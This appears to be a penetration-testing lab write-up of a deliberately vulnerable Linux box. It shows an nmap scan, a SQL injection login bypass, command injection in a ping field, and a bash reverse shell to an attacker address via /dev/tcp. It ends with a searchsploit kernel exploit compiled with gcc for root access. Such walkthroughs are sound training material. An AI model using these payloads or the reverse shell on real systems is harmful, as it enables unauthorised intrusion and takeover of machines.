First, I went ahead and launched a port scan against the target machine.
nmap -Pn -A -sV -p- $target
WEB - 80
/cgi-bin/ (Status: 403) [Size: 289] /cgi-bin/.html (Status: 403) [Size: 294] /index.php (Status: 200) [Size: 667] /index.php (Status: 200) [Size: 667] /manual (Status: 301) [Size: 315] /usage (Status: 403) [Size: 286]
The web app was vulnerable to SQL Injection Authentication Bypass as shown below.
admin' or '1'='1'#
I noticed that the web app executed commands on the base system based on user input.
Thus, I decided to try and inject custom commands into this field to trigger the system to run it.
127.0.0.1 && whoami
As seen above, I was able to get command execution on the machine via the web portal. I then used this vulnerability to get a reverse shell back to my attack box as follows.
127.0.0.1 && bash -i >& /dev/tcp/192.168.0.108/443 0>&1
And it worked!
While running linpeas, I noticed that the box was running a pretty old linux kernel version (2.6.9-55.EL).
I then made my way to searchsploit to look for a kernel exploit that would fit this particular target.
searchsploit linux 2.6 centos
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' | linux/local/9545.c
This was the exploit I ended up going with this!
I then transferred the file over to the remote machine before compiling it with GCC. This was to ensure that the architecture matched the executable in the end.
gcc -o exploit 9545.c
However, I ran into the shown error. All C source files need a newline at the end of the file for compilation. I just had to add that before compiling again.
After fixing that, the exploit compiled with no issues.
And I was the root user! 😁